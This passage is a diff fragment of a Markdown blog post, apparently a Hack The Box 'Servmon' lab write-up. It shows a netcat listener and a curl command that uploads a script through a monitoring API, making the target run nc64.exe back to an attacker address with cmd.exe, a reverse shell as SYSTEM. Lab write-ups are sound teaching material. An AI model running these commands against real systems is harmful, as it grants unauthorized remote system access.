Vorkharium/vorkharium.github.io/_posts/2024-11-09-HTB-Servmon-Write-up.md

 nc -lvnp 9001
 ```

+Now we will create a script and schedule it through the API.

-Run the command below to get a shell as system:
+Run the commands below to get a shell as system:

 ```shell
 curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/pwn.dat --data-binary "C:\Windows\Temp\nc64.exe 10.10.14.206 9001 -e cmd.exe"